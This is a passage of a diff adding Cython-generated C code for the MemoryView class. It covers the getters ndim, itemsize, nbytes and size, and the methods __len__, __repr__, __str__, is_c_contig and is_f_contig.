<<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":588 + * @property + * def ndim(self): + * return self.view.ndim # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 588, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.ndim.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":592 + * @property + * def itemsize(self): + * return self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.itemsize.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":596 + * @property + * def nbytes(self): + * return self.size * self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_size); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.nbytes.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + __pyx_t_1 = (__pyx_v_self->_size == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":601 + * def size(self): + * if self._size is None: + * result = 1 # <<<<<<<<<<<<<< + * + * for length in self.view.shape[:self.view.ndim]: + */ + __Pyx_INCREF(__pyx_int_1); + __pyx_v_result = __pyx_int_1; + + /* "View.MemoryView":603 + * result = 1 + * + * for length in self.view.shape[:self.view.ndim]: # <<<<<<<<<<<<<< + * result *= length + * + */ + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_t_5 = PyInt_FromSsize_t((__pyx_t_2[0])); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_5); + __pyx_t_5 = 0; + + /* "View.MemoryView":604 + * + * for length in self.view.shape[:self.view.ndim]: + * result *= length # <<<<<<<<<<<<<< + * + * self._size = result + */ + __pyx_t_5 = PyNumber_InPlaceMultiply(__pyx_v_result, __pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 604, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF_SET(__pyx_v_result, __pyx_t_5); + __pyx_t_5 = 0; + } + + /* "View.MemoryView":606 + * result *= length + * + * self._size = result # <<<<<<<<<<<<<< + * + * return self._size + */ + __Pyx_INCREF(__pyx_v_result); + __Pyx_GIVEREF(__pyx_v_result); + __Pyx_GOTREF(__pyx_v_self->_size); + __Pyx_DECREF(__pyx_v_self->_size); + __pyx_v_self->_size = __pyx_v_result; + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + } + + /* "View.MemoryView":608 + * self._size = result + * + * return self._size # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->_size); + __pyx_r = __pyx_v_self->_size; + goto __pyx_L0; + + /* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.size.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + __pyx_t_1 = (__pyx_v_self->view.ndim >= 1); + if (__pyx_t_1) { + + /* "View.MemoryView":612 + * def __len__(self): + * if self.view.ndim >= 1: + * return self.view.shape[0] # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_r = (__pyx_v_self->view.shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + } + + /* "View.MemoryView":614 + * return self.view.shape[0] + * + * return 0 # <<<<<<<<<<<<<< + * + * def __repr__(self): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":618 + * def __repr__(self): + * return "" % (self.base.__class__.__name__, + * id(self)) # <<<<<<<<<<<<<< + * + * def __str__(self): + */ + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_id, ((PyObject *)__pyx_v_self)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 618, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "View.MemoryView":621 + * + * def __str__(self): + * return "" % (self.base.__class__.__name__,) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyTuple_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_object, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_c_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_c_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_c_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_c_contig", 0); + + /* "View.MemoryView":627 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 627, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":628 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'C', self.view.ndim) # <<<<<<<<<<<<<< + * + * def is_f_contig(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'C', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 628, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_c_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_f_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_f_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_f_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_f_contig", 0); + + /* "View.MemoryView":633 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 633, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":634 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'F', self.view.ndim) # <<<<<<<<<<<<<< + * + * def copy(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'F', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 634, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_f_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef 